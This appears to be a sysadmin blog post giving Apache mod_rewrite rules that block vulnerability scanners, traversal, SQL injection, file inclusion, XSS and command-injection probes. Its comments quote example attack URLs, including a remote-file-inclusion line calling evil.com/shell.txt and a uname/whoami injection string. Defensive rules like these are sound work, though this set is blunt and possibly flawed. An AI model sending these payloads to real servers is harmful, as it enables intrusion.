May 2020
M T W T F S S
« Mar    
 123
45678910
11121314151617
18192021222324
25262728293031

Categories

WordPress Quotes

People often say that this or that person has not yet found himself. But the self is not something one finds, it is something one creates.
Thomas S. Szasz
May 2020
M T W T F S S
« Mar    
 123
45678910
11121314151617
18192021222324
25262728293031

Short Cuts

2012 SERVER (64)
2016 windows (9)
AIX (13)
Amazon (40)
Ansibile (19)
Apache (135)
Asterisk (2)
cassandra (2)
Centos (211)
Centos RHEL 7 (270)
centos8 (3)
chef (3)
cloud (2)
cluster (3)
Coherence (1)
DB2 (5)
DISK (25)
DNS (9)
Docker (30)
Eassy (11)
ELKS (1)
EXCHANGE (3)
Fedora (6)
ftp (5)
GIT (3)
GOD (2)
Grub (1)
Hacking (10)
Hadoop (6)
health (2)
horoscope (23)
Hyper-V (10)
IIS (15)
IPTABLES (15)
JAVA (7)
JBOSS (32)
jenkins (1)
Kubernetes (7)
Ldap (5)
Linux (188)
Linux Commands (166)
Load balancer (5)
mariadb (14)
Mongodb (4)
MQ Server (24)
MYSQL (84)
Nagios (5)
NaturalOil (13)
Nginx (35)
Ngix (1)
openldap (1)
Openstack (6)
Oracle (35)
Perl (3)
Postfix (19)
Postgresql (1)
PowerShell (2)
Python (3)
qmail (36)
Redis (12)
RHCE (28)
SCALEIO (1)
Security on Centos (29)
SFTP (1)
Shell (64)
Solaris (58)
Sql Server 2012 (4)
squid (3)
SSH (10)
SSL (14)
Storage (1)
swap (3)
TIPS on Linux (28)
tomcat (62)
Ubuntu (1)
Uncategorized (30)
Veritas (2)
vfabric (1)
VMware (28)
Weblogic (38)
Websphere (71)
Windows (19)
Windows Software (2)
wordpress (1)
ZIMBRA (17)

WP Cumulus Flash tag cloud by Roy Tanck requires Flash Player 9 or better.

Who's Online

0 visitors online now
0 guests, 0 bots, 0 members

Hit Counter provided by dental implants orange county

Apache mod_rewrite security rules for Web server harding

# Hardened Apache Mod_Rewrite Security Rule
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond
# NC = ‘nocase|NC’ (no case-sensitive)
# OR = ‘ornext|OR’ (or next condition)
# L = last rule
RewriteEngine on

# Allow only GET and POST verbs
# ‘Coz most vul scanners use HEAD for hunting buggy files existence
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]
# Ban Non-GUI Browsers
RewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR]

# Ban Typical Vulnerability Scanners and others

RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] # void of UserAgent

# Known Web vulnerabilty Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR]

# Random Underground Web Exploit Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\<script\>|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR]
# Denial-of-Service Tool
RewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]

# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]
# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT

# Directory Traversal, Null Byte Injection, HTTP Response Splitting
RewriteCond %{QUERY_STRING} ^.*(\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL Injection Probing
RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]
# Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]

# PHP Version Probing
RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]

# XSS Probing
RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]

# PHP GLOBALS Overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP REQUEST variable Overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC,OR]

# PHP CGI code execution

RewriteCond %{QUERY_STRING} ^[^=]*$ [OR]

RewriteCond %{QUERY_STRING} %2d|\-

# Deny access
RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]

 

 

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

  

  

  

Blue Captcha Image
Refresh

*

Protected by WP Anti Spam